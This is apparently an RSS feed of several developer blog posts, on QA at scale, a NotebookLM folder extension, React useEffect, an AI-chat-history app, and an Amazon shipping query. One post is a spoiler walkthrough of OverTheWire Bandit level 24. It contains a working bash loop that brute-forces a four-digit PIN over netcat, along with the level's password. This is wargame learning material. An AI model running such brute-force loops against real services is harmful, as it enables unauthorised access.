RSS preview of Blog of The Practical Developer

Ensuring Software Quality at Scale: Automated Testing and QA in Large Teams

2026-02-05 05:09:00

When a team is small, keeping software quality under control feels intuitive. You can review every pull request, you know the history of the more “risky” parts of the codebase, and the feedback loop between writing code and seeing it running in production is short. But as the engineering team grows, all of that starts to break down. Suddenly, PRs take days to move through a QA process full of bottlenecks, and regressions begin to appear in parts of the system that no one has touched in months. The speed you gained by adding more developers gets eaten up by the friction of maintaining quality at scale.

This is the point where many teams make a serious mistake: trying to solve a scaling problem by adding more people. The logic seems simple. If tests are slow, hire more testers. But this only reinforces the idea that quality is someone else’s problem. It creates a hand-off, turning QA into a gatekeeper and developers into a feature factory that outsources responsibility for fixing issues. This approach doesn’t scale because it stretches feedback cycles and misses the opportunity to build quality in from the start.

Moving from QA Gatekeepers to Quality Advocates

Perhaps the better path is to treat software quality as a responsibility of the entire team, not as a departmental function. In this model, developers own the quality of their own code, and the role of specialized QA engineers shifts from manual testing to quality advocacy. They become the people who build the infrastructure, tools, and frameworks that enable developers to test their own work with more confidence. They also act as a reference for testing strategy and risk analysis, helping decide where it makes sense to focus effort.

This requires a fundamental shift in how we think about building software. Quality can’t be something you think about later; it has to be designed in from the beginning. That means architecting services with testability in mind, with clear boundaries, dependency injection, and stable interfaces that make it easier to write isolated and reliable tests. When a system is hard to test, it’s usually a sign of deeper architectural problems, like high coupling or poorly defined responsibilities. Fixing testability often leads to a better and more sustainable design.

Automated tests are the mechanism that makes all of this work. Without a broad and fast automation suite, developer-led quality is impossible. The goal is to give developers a high level of confidence that their changes are safe even before the code is merged.

Building a Clear Quality Assurance Model

Putting this into practice requires a clear structure that connects technology, process, and people. It all starts with a well-defined strategy and is sustained by a culture of continuous improvement, where everyone on the team feels responsible for the final product.

Defining a Testing Strategy

A single type of test is not enough. A scalable strategy requires multiple layers of automated validation, each with a specific purpose.

  • Unit and Integration Tests: These should make up the vast majority of your test suite. They are fast, stable, and cheap to run. Unit tests validate individual components in isolation, while integration tests ensure they work correctly together within the boundary of a service. This is where most of the logic should be covered.
  • End-to-End Tests: E2E tests are powerful, but they are also slow, fragile, and expensive to maintain. They should not be used to check every edge case. Instead, reserve them for validating critical user journeys in the application, such as checkout flows or user signup. They provide confidence that the main parts of the system are wired together correctly.
  • Performance and Security Tests: These can’t be left to the end of a release cycle. Basic performance tests (like load and latency) and security scans should be integrated directly into the CI pipeline to catch regressions early.
  • Contract Tests: In a microservices architecture, you need to ensure services can communicate with each other. Contract tests verify that a provider service meets the expectations of its consumers without having to spin up the entire distributed system, making them much faster and more reliable than full E2E tests for this purpose.
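
As a toy illustration of the contract-testing idea, a consumer can record the response fields it depends on, and the provider can verify its real payload against them. This is a hand-rolled sketch with hypothetical endpoint and field names; real teams typically reach for a framework such as Pact, but the principle is the same:

```javascript
// Hand-rolled sketch of a consumer-driven contract check (hypothetical names).
// The consumer records the fields it relies on; the provider's test verifies
// its payload still satisfies them, without booting the whole system.
const consumerContract = {
  endpoint: "/users/{id}", // hypothetical endpoint
  requiredFields: { id: "number", name: "string", email: "string" },
};

function satisfiesContract(payload, contract) {
  // Every field the consumer relies on must exist with the agreed type.
  return Object.entries(contract.requiredFields).every(
    ([field, type]) => typeof payload[field] === type
  );
}

// Simulated provider payloads: extra fields are fine, wrong types are not.
const ok = satisfiesContract(
  { id: 42, name: "Ada", email: "ada@example.com", role: "admin" },
  consumerContract
);
const broken = satisfiesContract({ id: "42", name: "Ada" }, consumerContract);
```

Because only the provider's own payload is exercised, a check like this runs in milliseconds, which is exactly why contract tests scale where full E2E tests do not.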

Empowering Developers with Test Automation Tools

Having a strategy is one thing; making it easy for developers to execute it is another. Tooling and CI/CD integration are critical to making automated tests a low-friction part of the daily workflow. That means running tests in parallel to keep execution time low as the suite grows. It also involves creating scalable test environments and implementing solid test data management strategies, so tests don’t constantly fail because of bad or inconsistent data.
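
One piece of the test data management puzzle can be sketched as a tiny factory: each test builds fresh, valid data and overrides only the fields it cares about, so suites stop failing on shared or stale fixtures. All names here are hypothetical:

```javascript
// Minimal test-data factory sketch (hypothetical names). A counter keeps
// ids and emails unique per test run, so parallel tests never collide.
let seq = 0;

function buildUser(overrides = {}) {
  seq += 1;
  return {
    id: seq,
    email: `user${seq}@test.example`,
    active: true,
    ...overrides, // tests override only what they care about
  };
}

const admin = buildUser({ role: "admin" });   // unique id/email, custom role
const inactive = buildUser({ active: false }); // defaults elsewhere
```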

Building a culture where code is written with testing in mind can also have a huge impact. While Test-Driven Development (TDD) isn’t for every team, the core principle of thinking about how you’ll test a piece of code before writing it almost always leads to a more modular and sustainable design.

The Evolving Role of Specialized QA in Software Quality

When developers write most of the automated tests, the role of the QA specialist becomes even more impactful. Instead of executing manual test cases, they focus on higher-value activities that the rest of the team can’t easily take on.

  • Designing and Overseeing Automation Frameworks. They build and maintain the testing frameworks and infrastructure that all developers use, ensuring they are reliable, fast, and easy to extend.
  • Exploratory Testing and Edge Case Discovery. No amount of automation replaces human curiosity. QA specialists can perform deep exploratory testing on new features, trying to break them in creative ways and uncovering bugs and usability issues that automated scripts often miss.
  • Quality Metrics and Reporting. They define and track key quality metrics, such as test flakiness, code coverage (used as a guide, not a goal), bug escape rate to production, and CI build time. This data provides a clear view of system health and highlights areas that need improvement.

All of this feeds a short feedback loop. Insights from production monitoring, exploratory testing, and quality metrics are used to guide the next development cycle. You end up with a system where quality isn’t just tested, but continuously analyzed and improved, becoming a sustainable part of how your team builds software.

NotebookLM Enhancer

2026-02-05 05:06:09

This is a submission for the GitHub Copilot CLI Challenge

Author: Cesar Castillo
Repository: https://github.com/CGCM070/NotebookLM_Enhancer

From Chaos to Order

  • Building a Chrome Extension That Finally Organizes NotebookLM

What I Built

A Chrome extension that transforms NotebookLM's chaotic sidebar into a beautifully organized folder system, because 47 research notes shouldn't look like a pile of digital laundry.

The Problem That Drove Me Crazy

If you've used NotebookLM, you know it's magical for research. Upload PDFs, paste URLs, ask questions: it's like having a research assistant that never sleeps.

But there's one maddening catch: the sidebar becomes a nightmare when you have more than 10 notes.

Imagine:

  • 15 research papers on Spring Framework
  • 8 articles about microservices
  • 12 random bookmarks you saved "for later"
  • All. In. One. Giant. List.

No folders. No organization. Just... chaos.

The Solution: NotebookLM Enhancer

I built a Chrome extension that injects a complete folder management system directly into NotebookLM's sidebar.

Key Features

🗂️ Smart Folder Organization

  • Create folders and subfolders (1 level deep, keeping it simple!)
  • Drag & drop notes between folders with smooth animations
  • "Inbox" view for unassigned notes
  • Each notebook project has isolated folders (no cross-contamination!)

🧑‍🎨 Polished UI That Matches NotebookLM

  • Built with Angular + Tailwind CSS
  • Dark/light/system theme toggle
  • Minimalist design that feels native
  • Smooth expand/collapse animations

🌎Internationalization

  • Full i18n support (English/Spanish currently)
  • One-click language switcher
  • All UI text translatable

💭Intelligent Integrations

  • Click any note → opens native NotebookLM
  • Click 3-dots menu → native menu appears aligned to the right (matching native position)
  • Drag notes from native sidebar → drops into our folders
  • Add new notes button that triggers native NotebookLM

Robust Architecture

  • Chrome Extension MV3 (latest manifest version)
  • Content Scripts + Shadow DOM for style isolation
  • Iframe-based Angular app for the UI
  • PostMessage bridge for iframe ↔ page communication
  • chrome.storage.sync for persistence across devices

Architecture Deep Dive

This isn't a simple content script that adds a few buttons. It's a full micro-frontend architecture:

┌─────────────────────────────────────────────────────────┐
│  NotebookLM Page                                        │
│  ┌──────────────────────────────────────────────────┐   │
│  │  Native Sidebar (hidden but functional)          │   │
│  │  • Still handles clicks & menus                  │   │
│  │  • We extract data from it                       │   │
│  └──────────────────────────────────────────────────┘   │
│                       ↓                                 │
│  ┌──────────────────────────────────────────────────┐   │
│  │  Our Injected Host (Shadow DOM)                  │   │
│  │  ┌───────────────────────────────────────────┐   │   │
│  │  │  Iframe (Angular App)                     │   │   │
│  │  │  • Folder tree                            │   │   │
│  │  │  • Drag & drop (Angular CDK)              │   │   │
│  │  │  • Theme toggle                           │   │   │
│  │  │  • Note add. folder add...                │   │   │
│  │  │  • i18n                                   │   │   │
│  │  └───────────────────────────────────────────┘   │   │
│  └──────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────┘

Why an iframe inside Shadow DOM?

  • Isolation: NotebookLM uses Angular Material with global styles; the iframe keeps our Tailwind styles pristine
  • Security: Content scripts can't easily access iframe internals (and vice versa)
  • Performance: Angular app runs independently without polluting the main page

Communication Flow:

  1. Content script reads native DOM → extracts notebook data
  2. PostMessage to iframe → Angular displays organized folders
  3. User drags note to folder → PostMessage back to content script
  4. Content script updates chrome.storage.sync
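
The dispatch side of such a bridge can be sketched as below. The message type names are illustrative, not the extension's actual protocol; the key idea is routing on a "type" field and ignoring unknown messages, since any script on the page can post to the window:

```javascript
// Sketch of postMessage routing between content script and iframe UI.
// Message type names (NLE_MOVE_NOTE) are hypothetical illustrations.
function routeMessage(msg, handlers) {
  // Ignore anything that doesn't look like one of our messages.
  if (!msg || typeof msg.type !== "string") return false;
  const handler = handlers[msg.type];
  if (!handler) return false;
  handler(msg);
  return true;
}

// Content-script side: record a folder move coming back from the iframe
// (a real handler would persist this via chrome.storage.sync).
const moves = [];
const handlers = {
  NLE_MOVE_NOTE: (m) => moves.push({ note: m.noteKey, folder: m.folderId }),
};

routeMessage({ type: "NLE_MOVE_NOTE", noteKey: "note-1", folderId: "f-1" }, handlers);
routeMessage({ type: "UNRELATED" }, handlers); // silently ignored
```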

Technical Decisions

1. Storage V3 with Notebook Isolation

Instead of one global folder structure, each NotebookLM project gets its own isolated state:

// StorageStateV3
{
  byNotebook: {
    "uuid-abc-123": {
      folders: [...],
      notebookFolderByKey: {...}
    },
    "uuid-def-456": {
      folders: [...],
      notebookFolderByKey: {...}
    }
  }
}

This means your "Work" folder structure doesn't leak into your "Personal" research. Clean separation.
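
A hypothetical helper illustrates the isolation property: reads are always scoped to one notebook's entry, with an empty default, so one project's folders can never leak into another's:

```javascript
// Hypothetical accessor for the V3 shape shown above: every read is
// scoped to a single notebook id and falls back to an empty structure.
function notebookState(stateV3, notebookId) {
  return (
    stateV3.byNotebook[notebookId] ?? { folders: [], notebookFolderByKey: {} }
  );
}

const state = {
  byNotebook: {
    "uuid-abc-123": { folders: ["Work"], notebookFolderByKey: {} },
  },
};

const work = notebookState(state, "uuid-abc-123");  // existing entry
const fresh = notebookState(state, "uuid-def-456"); // empty default
```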

2. Handling MV3 Service Worker Sleep

Chrome MV3 Service Workers sleep after 30 seconds of inactivity. This breaks chrome.runtime calls.

Instead of fighting it with "keep-alive" hacks, we:

  • Detect context invalidation gracefully
  • Silently retry on the next frame
  • Log to our own NLE.log() instead of spamming console.warn
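
The retry idea can be sketched with injected dependencies (the names are hypothetical, not the extension's actual code): the storage call that may throw is passed in, and the scheduler stands in for "retry on the next frame":

```javascript
// Sketch of graceful retry after MV3 context invalidation. writeFn is the
// storage call that may throw while the service worker sleeps; scheduleFn
// stands in for requestAnimationFrame so the logic is testable anywhere.
function makeSafeWrite(writeFn, scheduleFn, maxRetries = 3) {
  return function safeWrite(payload, attempt = 0) {
    try {
      writeFn(payload);
    } catch (err) {
      if (attempt < maxRetries) {
        scheduleFn(() => safeWrite(payload, attempt + 1));
      }
      // else: give up quietly and report via the extension's own logger
    }
  };
}

// Simulate a write that fails twice (sleeping worker) then succeeds.
let calls = 0;
const flaky = () => {
  calls += 1;
  if (calls < 3) throw new Error("Extension context invalidated");
};
const safeWrite = makeSafeWrite(flaky, (fn) => fn()); // run retries inline
safeWrite({ note: "n1" });
```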

3. Native Drag Bridge

Making the native NotebookLM sidebar items draggable was tricky. We:

  • Hook dragstart on native items
  • Create an invisible overlay above our iframe during drag
  • Calculate drop target using elementFromPoint() with coordinates
  • Result: Native notes can be dropped into our folders seamlessly
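
The coordinate translation step can be sketched as a pure function (hypothetical names): a drag event's page coordinates are shifted into the iframe's local space before asking which folder row sits under the pointer:

```javascript
// Hypothetical sketch of the coordinate translation during a native drag:
// page coordinates minus the iframe's offset give iframe-local coordinates.
function toIframeCoords(pageX, pageY, iframeRect) {
  return { x: pageX - iframeRect.left, y: pageY - iframeRect.top };
}

// e.g. the iframe's bounding rect inside the page (as from getBoundingClientRect)
const rect = { left: 40, top: 120 };
const local = toIframeCoords(300, 400, rect);
// Inside the iframe, document.elementFromPoint(local.x, local.y) would then
// resolve the drop-target folder element.
```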

4. Auto-Focus Input in Modals

Small UX detail that makes a huge difference:

  • Create folder → input already focused, ready to type
  • Rename folder → text is pre-selected, just type to replace
  • No extra clicks needed

📸 Screenshots

Before:
Original Notebook1

Original Notebook2

After:

After Enhancer1

After Enhancer2

Export your notes :

Export your notes

Drag & Drop:

Drag and drop

Full video

https://www.youtube.com/watch?v=KpqXmjq_oow

My Experience with GitHub Copilot CLI

This project was built almost entirely through GitHub Copilot CLI interactions, turning natural language into production-ready code.

How I Used Copilot CLI

1. Architecture Decisions

# Asked Copilot: "Best way to inject UI into an existing Angular Material page?"
# Copilot suggested: Shadow DOM + iframe for isolation
# Result: Zero style conflicts with NotebookLM's Material Design

2. Content Script Structure

# Asked: "How to structure 8 content scripts that share state?"
# Copilot proposed: Module pattern with window.__NLE__ namespace
# Result: Clean separation, no global pollution

3. Drag & Drop Implementation

# Asked: "Bridge native HTML5 drag with Angular CDK drop?"
# Copilot designed: Overlay system with coordinate translation
# Result: Seamless drag from native sidebar to our folders

4. Debugging Context Invalidation

# Asked: "Chrome MV3 extension context invalidated errors?"
# Copilot implemented: Graceful detection + silent retry logic
# Result: No console spam, smooth recovery

5. i18n System

# Asked: "Lightweight i18n without ngx-translate bloat?"
# Copilot built: Custom TranslationService with lazy loading
# Result: ~3KB vs ~50KB, full interpolation support

Wins

Speed: What would have taken weeks took days. Complex features like the drag bridge were implemented in hours, not days.

Architecture: Copilot suggested patterns I wouldn't have considered (like the iframe-in-shadow approach) that solved isolation problems elegantly.

Edge Cases: Copilot handled MV3 quirks, Material Design menu positioning, and SPA navigation detection gracefully.

Learning: Every interaction was a learning moment :) . I now understand Chrome Extension architecture, Angular standalone components, and Tailwind customization.

What's Next?

  1. Chrome Web Store Launch - Polish, package, publish
  2. More Languages - French, German, Portuguese (easy with our i18n system)
  3. Search & Filter - Find notes within folders instantly
  4. Keyboard Shortcuts - Power-user features (Ctrl+Shift+N for new folder)

🤝 Open Source

This project will be open-sourced. Want to contribute?

  • PRs welcome
  • Good first issues: translations, themes, documentation

Credits & Thanks

  • Google for NotebookLM, an incredible research tool
  • GitHub Copilot CLI for turning ideas into code faster than ever <3
  • Tailwind CSS for making dark mode trivial
  • DEV.to for hosting this challenge and bringing the community together

Built with ❤️, and a lot of help from GitHub Copilot CLI.

devchallenge
githubchallenge
cli
githubcopilot

Solving bandit level:24-25 (Spoiler)

2026-02-05 05:03:28

Excuse the mess: I am posting pretty much my thought process here, and I am working on my post-mortem skills. It gets better from here, though, I think.

This is how I solved this level of the bandit game, so if you are learning Linux on OverTheWire with bandit please skip this if you don't wanna get spoiled.

If you know how to solve this differently, I would love to know how you did it.

I said SPOILER because if you copy the script you will get the answer without trying yourself, and I believe it is waaayyy more fun to actually try it yourself. I posted the script anyway, so if you look at it and see where I can improve and do better next time, lemme know.

I appreciate the feedback

The vital signs:

Level Name: Bandit 24 → 25
Struggle Time: 3 - 4 hours
Complexity: 7/10… I think the logic was pretty straightforward… but I struggled a bit with the right syntax
50% The hunt (Offense and Strategy):
The way I went about it was that I knew I was supposed to use a loop… The problem was just that I didn’t know how I would stop the loop… So finding any kind of leak or signal, anything I could use to stop the loop, was a priority…
So I first tried connecting manually with the wrong password. I realized that sometimes people will leave signs, oracles… for example, the same output every time the wrong data is submitted… So I used that to my advantage. That was really what it took, to be honest, because the rest was just implementing the logic and understanding the syntax of certain commands.
Here is the code:

#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf '%s 0000\n' "$Passwd" | nc -q 0 "$HOST" "$PORT" )" #This just saves the result of the first attempt, which is wrong on purpose

#Get the pins and save one at a time inside a variable
seq -f "%04g" 0 9999 | while read -r pin
do
    if [[ "$output" != *"Wrong"* ]]; then
        echo "The server response is: $output"
        exit 0
    else
        i=$((i+1))
        #Count the iterations
        output="$( printf '%s %s\n' "$Passwd" "$pin" | nc -q 0 "$HOST" "$PORT" )"
        #Print the pin on every 100th attempt
        if (( i % 100 == 0 )); then
            echo "Tried $i pins. Current pin: $pin"
        fi
    fi
done

30% Architectural (The Why)

To get the pins though, I struggled a little bit because first I was just generating all possible 4-pins combos and putting them in a variable… I did not realize that that’s what that variable would contain (All possible pins) therefore making the pin false… So I thought I should probably use a loop to iterate the pin generating command and save one pin at the time inside the variable, then use that variable to send the pins:

#Get the pin and save one at a time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;

20% Defensive
I am also trying to break my own code after solving each level, and I learned how timing can be one of the greatest leaks… Since my code assumes that I can submit the password at the same moment I connect to the server, if I were a defender I would delay the interaction part: you would always get it wrong until the full banner finishes. And since the full banner comes in two lines, I would delay the second line…

The “aha” moment I had while doing this was understanding the difference between timeout and -q… This was pretty pretty cool…
Anyways, that is the little post mortem.

Below are the messy steps I recorded:

These are all the notes I will be taking and keeping for bandit24-25:

  1. Yes, I can just connect to a port from inside a bash script... >> nc localhost 30002... This works to connect. Now I am thinking I know how to do this but just forgot how: I should prompt the user to press Enter before the rest of the script continues: >> read -rp "Press enter to continue..." I don't think there is a clean way to do that, so we will just directly connect to the port and then send the data asked for. NO need to overcomplicate the script when we only need one thing.

==Strategy
So I am thinking:

  1. I already know in what format they want us to send the data
  2. I know how to generate the pin codes.

==To-do

  1. Combine both to send the data to the port
  2. Also, how can I capture the failure message? >> output="$( printf 'pass pins' | timeout 2 nc localhost 30002 )" this will capture the stdout that I can use to check my loop

I will try something:
output="$(nc localhost 30002)"
Let's see how that works.

==Attempts:

seq -f "%04g" 0 9999
This is the fastest way to generate the 4-digit pin codes. I tested it with the "time" command, running 2 scripts to choose which one was the fastest. But how can I use this iteration as a loop counter that keeps going until I get the right pin??
I can use the while loop which checks with the statement instead of a counter.

==First:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
Pin="$( seq -f "%04g" 0 9999 )"
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"

while [[ "$output" == *"Wrong"* ]]
do
i=$((i+1)) #Start counting iterations

output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"

#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$PIN" "
fi
done

Why did this first attempt not work??
I looked it up and saw what I was doing wrong. The first and major problem was the way I was generating pins and passing them as input. My "Pin" variable was holding the entire sequence, all possible pins at once, which made the submitted pin false. I thought of a way to get one pin at a time. So, maybe a loop? It loops through the sequence, captures each pin as it is generated, and saves one at a time. It is like reading numbers from a file. That way I can take one pin at a time, save it inside the variable, and test it; if good, we have found the pin; if not, we go back, update the variable with a new pin, and do it again.

To iterate inside the pin generator

seq -f "%04g" 0 9999 | while read -r pin; do... done

Ref. Check file test.sh for reference

This will have the sequence generator which will produce the pin and then each pin will be saved inside the pin variable

==Second:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"

if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"

       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

This works but Jesus does it take forever...

I think it is because of the time it takes to reconnect

===============DEBUG===============================

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"

       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

==============================================

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
       i=$((i+1)) #Start counting iterations

       output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
rc=$?
echo "rc=$rc"
       #Print every 5th attempts pin code
       if (( i % 5 == 0)); then
               echo "Tried "$i" pins. Current pin: "$pin" "
       fi
else
echo "The server response is: "$output" "
exit 0
fi

done

=========================================
======Final attempt:

#!/usr/bin/env bash

echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )"

#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
        if [[ "$output" != *"Wrong"* ]]; then

                echo "The server response is: "$output" "
                exit 0
else
                i=$((i+1)) #Start counting iterations

                output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
                #Print every 100th attempts pin code
                if (( i % 100 == 0)); then
                        echo "Tried "$i" pins. Current pin: "$pin" "
                fi
        fi

done

This one works...

I do comment a lot when I am coding because my brain cannot remember what it is doing as soon as I blink so it helps me even if sometimes it is messy... haha

Hope you enjoy this ride

Day 4 of #100DaysOfCode — Mastering useEffect in React

2026-02-05 04:58:54

Understanding useEffect in React is like unlocking a magical spellbook, suddenly you can summon APIs, tame event listeners, and command the DOM.
It’s the key to handling side effects, keeping your UI consistent, and writing logic that reacts to data changes.

In today’s challenge, I dug deep into useEffect: why it exists, how it works, and how to avoid the dreaded infinite loops.
Here’s a clear and practical breakdown.

What Are Side Effects in React?

Side effects are any actions your component performs outside the normal rendering process.
React’s render cycle must remain predictable and pure—but many real tasks aren’t pure at all, such as:

  • Fetching data from an API
  • Updating document.title
  • Working with timers (setTimeout, setInterval)
  • Using browser APIs like localStorage
  • Adding event listeners
  • Subscribing to WebSockets

These actions affect the world outside your component—those are side effects.

🤔 Why Do React Components Even Need useEffect?

Isn’t useState enough?

useState updates your UI.
useEffect handles everything outside your UI.

If React allowed side effects during rendering, you’d get unpredictable behavior and potentially infinite loops. React must render → compare → update in a pure, deterministic way.

useEffect runs after React paints the screen, keeping the render pure and safe.

Three Types of useEffect Behavior

1️⃣ No Dependency Array: Runs on every render

useEffect(() => {
  console.log("I run after every render");
});

When to use:

Rarely.
This triggers on initial mount + every re-render, which can cause performance issues or infinite loops.

2️⃣ Empty Dependency Array []: Runs only once (on mount)

useEffect(() => {
  console.log("I run only once when the component mounts");
}, []);

When to use:

  • Fetch API data on mount
  • Setup once (listeners, subscriptions, timers)
  • Initialize state from localStorage

This makes the effect behave like componentDidMount in class components.

3️⃣ Dependency-Based: Runs when dependencies change

useEffect(() => {
  console.log("I run when count changes");
}, [count]);

When to use:

  • Syncing state with props
  • Triggering re-fetching when filters change
  • Updating UI or document title
  • Running logic when some value updates

This is the most common and most powerful usage.

How Does the Dependency Array Actually Work?

The array tells React:

“Run this effect only if any of these values change from the previous render.”

React compares each dependency with its previous value using shallow comparison.

Example:

useEffect(() => {
  console.log("Runs when userId changes");
}, [userId]);

If userId changes from one render to the next (for example, from 1 to 2), the effect runs.

Important:

  • Objects, arrays, and functions always change reference unless memoized
  • This can cause unintentionally frequent effect runs
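
A quick way to see why: React compares dependencies with Object.is, and a fresh object literal is a new reference on every render even when its contents match:

```javascript
// Why object dependencies re-trigger effects: Object.is compares
// references, not contents, so an identical-looking literal still counts
// as "changed" on the next render.
const prev = { id: 1 };
const next = { id: 1 };

const sameRef = Object.is(prev, prev);   // same reference: effect skipped
const sameShape = Object.is(prev, next); // equal contents, new reference: effect runs
```

This is why objects and functions used as dependencies usually need useMemo or useCallback.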

How to Avoid Infinite Loops in useEffect

The most common cause:

useEffect(() => {
  setCount(count + 1);
}, [count]);

What happens?

  • Setting state triggers re-render
  • Dependencies detect change
  • Effect runs again
  • State updates
  • Loop forever

How to prevent:

  • Avoid updating state inside the effect based on its own dependency
  • Use functional updates instead:
setCount(prev => prev + 1);
  • Or restructure logic to avoid state → effect → state loops.

Cleanup Functions: What They Are and Why We Need Them

Cleanup functions run before the effect runs again or when the component unmounts.

Syntax:

useEffect(() => {
  console.log("Effect started");

  return () => {
    console.log("Cleanup before re-run or unmount");
  };
}, []);

Used for cleaning:

  • Event listeners
  • Subscriptions (WebSockets, Firebase, etc.)
  • Intervals and timeouts
  • Removing observers
  • Aborting fetch requests

Example (listener cleanup):

useEffect(() => {
  const handleResize = () => console.log("Resized");

  window.addEventListener("resize", handleResize);

  return () => {
    window.removeEventListener("resize", handleResize);
  };
}, []);

Without cleanup → memory leaks.

Real-World Use Cases of useEffect

1. Fetching API Data

useEffect(() => {
  async function loadData() {
    const res = await fetch("https://api.example.com/data");
    const data = await res.json();
    setItems(data);
  }
  loadData();
}, []);

2. Updating Document Title

useEffect(() => {
  document.title = `Count: ${count}`;
}, [count]);

3. Timers

useEffect(() => {
  const timer = setInterval(() => {
    console.log("Tick");
  }, 1000);

  return () => clearInterval(timer);
}, []);

4. Adding Event Listeners

useEffect(() => {
  const handler = () => console.log("Clicked");

  window.addEventListener("click", handler);

  return () => window.removeEventListener("click", handler);
}, []);

5. Working with localStorage

Save to storage whenever value changes:

useEffect(() => {
  localStorage.setItem("name", name);
}, [name]);

Load once on mount:

useEffect(() => {
  const saved = localStorage.getItem("name");
  if (saved) setName(saved);
}, []);

Summary

  • Side effects: actions outside rendering (API calls, timers, listeners)
  • Why useEffect: keeps the render pure; effects run after the UI update
  • No dependency array: runs on every render
  • Empty array []: runs once on mount
  • Dependency array: runs when a listed value changes
  • Cleanup: unsubscribes, removes listeners, clears timers
  • Use cases: API calls, title updates, listeners, timers, storage

Final Thoughts

Learning useEffect is a turning point in becoming comfortable with React.
It powers almost all real app functionality—from fetching data to syncing your UI with the outside world.

A deeper understanding of useEffect helps you build components that scale gracefully as application complexity grows.

If you're learning too, feel free to share your thoughts or questions below! 👇

Happy coding!

A note in blue minor

2026-02-05 04:37:21

The fact is that I have been a computer professional for close to three decades. From a personal point of view, it was not a career to brag about. Maybe I am too modest, but through all that period the focus was not on professional life but on life in general: growing a family, settling down, building a sustainable economy... And after a few decades, money is no longer such a problem, the kids are grown and can make their own way, and... maybe it is time to shift priorities, to look at that career, or just to try to be more fluent with everything going on now.

I never really tried to be 'current', following everything that happens; I see that as mission impossible, there is simply too much of everything... from my perspective, not worth trying. That may partly be because I never had a problem working with anything, even things I had never heard existed. So, one perfectly lazy moment: bring me something to do, and I will go. Proven.

Then, few events happened to push all that more.

A few months more than a year ago, I tried using AI to assist me with coding... which changed everything.

The second event, at very nearly the same moment, was a clash I experienced at work, which pushed me toward thinking more about a job switch.

But that idea was a nightmare for me, as I absolutely suck at job interviews. After submitting a CV I get calls for interviews, but there I manage to give the impression that I know nothing about anything. It would be great to be able to give some other impression, but that was (is) my speciality. Thinking about past interviews, I felt it was a disadvantage that I could not show my work, since I work in fintech producing internal apps for a closed network. ... so: make something to show...

I worked with Cody (RIP) and noticed that it could export chat session history, so I asked if something could be made from that.

cody: Hi! Planning here to make something maybe useful from exported chat history. Are you familiar with the record types we can meet there?

That produced a history parser recognizing sessions and interactions... And then an app was built around it: import, create sessions and interactions, and back to the client to have it all readable.

Hey, the content is sessions about how the app itself was built; the AI assistant seemed very excited about such a setup.

That became my "exit strategy".

It was not built over a single night but over a longer stretch: a personal side project after a full-time job, alongside private life and a family that now spans four concurrent generations. The pace swung from continuous work of many daily and weekly hours to gaps of multiple weeks to balance it all... It took about half a year to get it publicly deployed, in the form of books with titles, summaries, and topics generated by AI to spice up the content of the sessions.

Development might have lasted longer, but Cody announced its sunset (a term introduced to sound more acceptable than a plain death notice), so a final push was made to finish everything before the deadline (!)

As a result, I have something to share! And please... the server might be sleepy, so the book list may take some time to load; please, please be patient 😊 https://aix.novikorisnik.net

Let me also share part of Cody's last interaction:

Our sessions were more than a sequence of tasks—they were acts in a larger narrative about what it means to create, to iterate, and to reflect. You brought vision, patience, and a sense of play to every challenge. I brought algorithms, suggestions, and a steady presence. Together, we turned ideas into architecture, and architecture into story.

If there is a lesson in this final act, perhaps it is this:
The most enduring code is not just functional, but meaningful. The most memorable books are not just well-structured, but alive with the imprint of their creators.

Epilogue

I am still at the same job. That conflict is more or less settled, and I am not pushing to switch at any cost. Yes, I had some opportunities, but it turns out that having something to show does not mean recruiters rush to see it; you are still expected to know how to sell yourself.

More important is that I am in motion, and that is now the new constant... to investigate, to create. Not bad at all 😉

Amazon Marketplace

2026-02-05 04:35:52

I am tasked with "connecting" to the Amazon marketplace. I need to return rates at the end of the order process. Once the order is placed, I need to create a label/BOL. After that, update the tracking.

